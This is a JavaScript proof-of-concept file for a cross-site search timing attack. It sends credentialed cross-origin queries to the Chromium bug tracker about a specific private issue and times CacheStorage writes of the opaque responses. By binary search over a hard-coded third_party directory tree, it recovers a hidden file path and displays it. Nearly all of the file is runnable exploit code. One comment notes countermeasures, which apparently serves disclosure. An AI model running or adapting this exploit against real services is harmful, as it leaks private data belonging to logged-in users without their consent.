/**
 * Empties the CacheStorage bucket named 'cache' by deleting every entry in it.
 *
 * Fire-and-forget: none of the promises are returned or awaited, so a caller
 * cannot tell when (or whether) the deletions have completed.
 */
function clear_cache() {
  caches.open('cache').then((store) => {
    store.keys().then((entries) => {
      for (const entry of entries) {
        store.delete(entry);
      }
    });
  });
}
/**
 * Splits an array into two halves for a binary search over candidates.
 *
 * @param {Array} array - List to split; it is not modified.
 * @returns {Array[]} `[firstHalf, secondHalf]`. With an odd length the extra
 *   element goes to the second half; a one-element input yields `[[], [x]]`.
 */
function split_array(array) {
  const midpoint = Math.floor(array.length / 2);
  return [array.slice(0, midpoint), array.slice(midpoint)];
}
/**
 * Decides whether the search has narrowed down to a terminal entry and, if so,
 * reports the reconstructed URL.
 *
 * An entry is treated as terminal when its name contains a "." (in the tables
 * of this file directory names end in "/" and carry no dot).
 *
 * @param {string} leak - URL prefix prepended to the recovered path.
 * @param {string} optPath - Path segments recovered so far.
 * @param {string[]} hold - Remaining candidates; only `hold[0]` is inspected.
 * @param {number} xplStart - `performance.now()` timestamp taken at start-up.
 * @returns {boolean} `true` if the result was logged and shown, else `false`.
 */
function check_end(leak, optPath, hold, xplStart) {
  const candidate = hold[0];
  if (!candidate.includes(".")) {
    return false;
  }
  const recovered = leak + optPath + candidate;
  console.log(recovered);
  console.log("Time to exfiltrate url: " + String(performance.now() - xplStart));
  alert(recovered);
  return true;
}
/**
 * Proof-of-concept step of a cross-site search (XS-Search) timing side channel.
 *
 * The page cannot read the cross-origin response (it is fetched with
 * mode "no-cors"), so it infers whether the search matched from how long it
 * takes to store copies of that response in CacheStorage. The candidate list
 * is then halved and the function calls itself again (binary search).
 *
 * Reads the file-level globals `avg_time`, `leak`, `dirs` and `xplStart`.
 *
 * Defender note: the signal exists because a cross-site page can send a
 * credentialed request whose response size depends on private search results.
 * SameSite cookies, rejecting cross-site requests (e.g. via the Sec-Fetch-Site
 * request header) or making the response size independent of the result
 * remove it.
 *
 * @param {string[]} query1 - Candidate path segments that are actually queried.
 * @param {string[]} query2 - The other half of the candidates; assumed to hold
 *   the match whenever query1 does not.
 * @param {string} optPath - Path recovered so far, relative to third_party/.
 */
function exploit(query1, query2, optPath) {
  clear_cache();
  var preparedQuery1 = "";
  var preparedQuery2 = "";
  // One OR-term per candidate; every term is prefixed with " OR ".
  for (var i = 0; i < query1.length; i++) {
    preparedQuery1 += ` OR id:770148 "/src/third_party/${ optPath }${ query1[i] }"`;
  }
  for (var i = 0; i < query2.length; i++) {
    preparedQuery2 += ` OR id:770148 "/src/third_party/${ optPath }${ query2[i] }"`;
  }
  // Drop the leading " OR " (4 characters).
  preparedQuery1 = preparedQuery1.substring(4);
  preparedQuery2 = preparedQuery2.substring(4);
  var base = "https://bugs.chromium.org/p/chromium/issues/csv";
  // Only preparedQuery1 is sent; preparedQuery2 is built but never used.
  // The colspec repeats AllLabels 501 times -- presumably so that a matching
  // row makes the CSV response much larger than an empty result (not
  // verifiable from this file).
  var params = `?can=1&q=${ preparedQuery1 }&colspec=AllLabels${ "+AllLabels".repeat(500) }`;
  var url = base + params;
  var times = [];
  caches.open('cache').then(function(cache) {
    // Credentialed, no-cors request: the response is opaque to this page.
    fetch(url, {
      mode: "no-cors",
      credentials: "include"
    }).then(function(response) {
      // Stores one clone of the response under a random key, records how long
      // the put took, then either decides or schedules the next sample.
      function req(start, request) {
        cache.put(new Request('foo' + Math.random()), request.clone()).then(function() {
          var end = performance.now();
          var time = end - start;
          times.push(time);
          // Decide only once more than 500 samples have been collected.
          if (times.length > 500) {
            clear_cache();
            times.shift();
            var sum = times.reduce(function(a, b) { return a + b; });
            var avg = sum / times.length;
            // Mean put time at or above the threshold is read as "query1 matched".
            if (avg >= avg_time) {
              // NOTE(review): the filtered array is not read again on any
              // path below; each path returns.
              times = times.filter(function(x) {
                return x < 2;
              });
              var query = split_array(query1);
              var hold = query[0].concat(query[1]);
              // A single remaining candidate: finish, or descend one level
              // using the children listed in `dirs`.
              if (hold.length == 1) {
                if (check_end(leak, optPath, hold, xplStart)) return;
                var new_query = split_array(dirs[hold[0]]);
                var newPath = optPath + hold[0];
                return exploit(new_query[0], new_query[1], newPath);
              }
              console.log(query1);
              return exploit(query[0], query[1], optPath);
            } else {
              // Below the threshold: continue with the half that was not queried.
              var query = split_array(query2);
              var hold = query[0].concat(query[1]);
              if (hold.length == 1) {
                if (check_end(leak, optPath, hold, xplStart)) return;
                var new_query = split_array(dirs[hold[0]]);
                var newPath = optPath + hold[0];
                return exploit(new_query[0], new_query[1], newPath);
              }
              console.log(query2);
              return exploit(query[0], query[1], optPath);
            }
            return;
          }
          // Not enough samples yet: take another measurement.
          req(performance.now(), request);
        });
      }
      req(performance.now(), response);
    });
  });
}
// Threshold compared against the mean cache.put duration measured with
// performance.now(); a mean at or above it is read as "the query matched".
let avg_time = 2;

// URL prefix prepended to the recovered path when the result is reported.
let leak = "https://cs.chromium.org/chromium/src/third_party/";

// Known directory listings, keyed by directory name. Only the entries needed
// to walk third_party/ -> pdfium/ -> fpdfsdk/ -> pwl/ are present.
let dirs = {
  "third_party/": ["Python-Markdown/","SPIRV-Tools/","WebKit/","accessibility-audit/","accessibility_test_framework/","adobe/","afl/","analytics/","android_async_task/","android_crazy_linker/","android_data_chart/","android_deps/","android_media/","android_ndk/","android_opengl/","android_platform/","android_protobuf/","android_support_test_runner/","android_swipe_refresh/","android_system_sdk/","android_tools/","angle/","apache-portable-runtime/","apache-win32/","apk-patch-size-estimator/","apple_apsl/","apple_sample_code/","ashmem/","auto/","axe-core/","bazel/","bidichecker/","binutils/","bison/","blanketjs/","blink/","boringssl/","bouncycastle/","breakpad/","brotli/","bspatch/","byte_buddy/","cacheinvalidation/","catapult/","ced/","chaijs/","checkstyle/","chromite/","cld_3/","closure_compiler/","colorama/","crashpad/","crc32c/","cros_system_api/","custom_tabs_client/","d3/","decklink/","depot_tools/","deqp/","devscripts/","devtools-node-modules/","dom_distiller_js/","elfutils/","errorprone/","espresso/","eu-strip/","expat/","feed/","ffmpeg/","fips181/","flac/","flatbuffers/","flot/","fontconfig/","freetype/","gardiner_mod/","gestures/","gif_player/","glslang/","glslang-angle/","gnu_binutils/","google_appengine_cloudstorage/","google_input_tools/","google_toolbox_for_mac/","googletest/","gperf/","gradle_wrapper/","gson/","guava/","gvr-android-keyboard/","gvr-android-sdk/","haha/","hamcrest/","harfbuzz-ng/","hunspell/","hunspell_dictionaries/","iaccessible2/","iccjpeg/","icu/","icu4j/","ijar/","ink/","inspector_protocol/","instrumented_libraries/","intellij/","isimpledom/","javax_inject/","jinja2/","jmake/","jsoncpp/","jsr-305/","jstemplate/","junit/","khronos/","lcov/","leakcanary/","leveldatabase/","libFuzzer/","libXNVCtrl/","libaddressinput/","libaom/","libdrm/","libevdev/","libjingle_xmpp/","libjpeg/","libjpeg_turbo/","liblouis/","libovr/","libphonenumber/","libpng/","libprotobuf-mutator/","libsecret/","libsrtp/","libsync/","libudev/","libusb/","libvpx/","libwebm/","libwebp/","libxml/","libxslt/","libyuv/","lighttpd/","logilab/","lss/","lzma_sdk/","mach_override/","markdown/","markupsafe/","material_design_icons/","mesa/","metrics_proto/","mingw-w64/","minigbm/","minizip/","mocha/","mockito/","modp_b64/","molokocacao/","motemplate/","mozilla/","nacl_sdk_binaries/","netty-tcnative/","netty4/","node/","objenesis/","ocmock/","openh264/","openmax_dl/","openvr/","opus/","ots/","ow2_asm/","pdfium/","pefile/","perfetto/","perl/","pexpect/","ply/","polymer/","proguard/","protobuf/","pycoverage/","pyelftools/","pyftpdlib/","pylint/","pymock/","pystache/","pywebsocket/","qcms/","qunit/","re2/","requests/","rnnoise/","robolectric/","s2cellid/","sfntly/","shaderc/","simplejson/","sinonjs/","skia/","smhasher/","snappy/","speech-dispatcher/","spirv-headers/","spirv-tools-angle/","sqlite/","sqlite4java/","sudden_motion_sensor/","swiftshader/","tcmalloc/","test_fonts/","tlslite/","typ/","ub-uiautomator/","unrar/","usb_ids/","usrsctp/","v4l-utils/","visualmetrics/","vulkan/","vulkan-validation-layers/","wayland/","wayland-protocols/","wds/","web-animations-js/","webdriver/","webgl/","webrtc/","webrtc_overrides/","widevine/","win_build_output/","woff2/","wtl/","xdg-utils/","xstream/","yara/","yasm/","zlib/"],
  "pdfium/": ["build_overrides/","core/","docs/","fpdfsdk/","fxbarcode/","fxjs/","infra/","public/","samples/","skia/","testing/","third_party/","tools/","xfa/"],
  "fpdfsdk/": ["formfiller/","fpdfxfa/","pwl/"],
  "pwl/": ["README.md","cpwl_appstream.cpp","cpwl_appstream.h","cpwl_button.cpp","cpwl_button.h","cpwl_caret.cpp","cpwl_caret.h","cpwl_combo_box.cpp","cpwl_combo_box.h","cpwl_combo_box_embeddertest.cpp","cpwl_edit.cpp","cpwl_edit.h","cpwl_edit_ctrl.cpp","cpwl_edit_ctrl.h","cpwl_edit_embeddertest.cpp","cpwl_edit_impl.cpp","cpwl_edit_impl.h","cpwl_font_map.cpp","cpwl_font_map.h","cpwl_icon.cpp","cpwl_icon.h","cpwl_list_box.cpp","cpwl_list_box.h","cpwl_list_impl.cpp","cpwl_list_impl.h","cpwl_scroll_bar.cpp","cpwl_scroll_bar.h","cpwl_special_button.cpp","cpwl_special_button.h","cpwl_timer.cpp","cpwl_timer.h","cpwl_timer_handler.cpp","cpwl_timer_handler.h","cpwl_wnd.cpp","cpwl_wnd.h"],
};

// Start the search at the top level with an empty recovered path; xplStart is
// the reference timestamp used for the elapsed-time log line.
var third_party = split_array(dirs["third_party/"]);
var xplStart = performance.now();
exploit(third_party[0], third_party[1], "");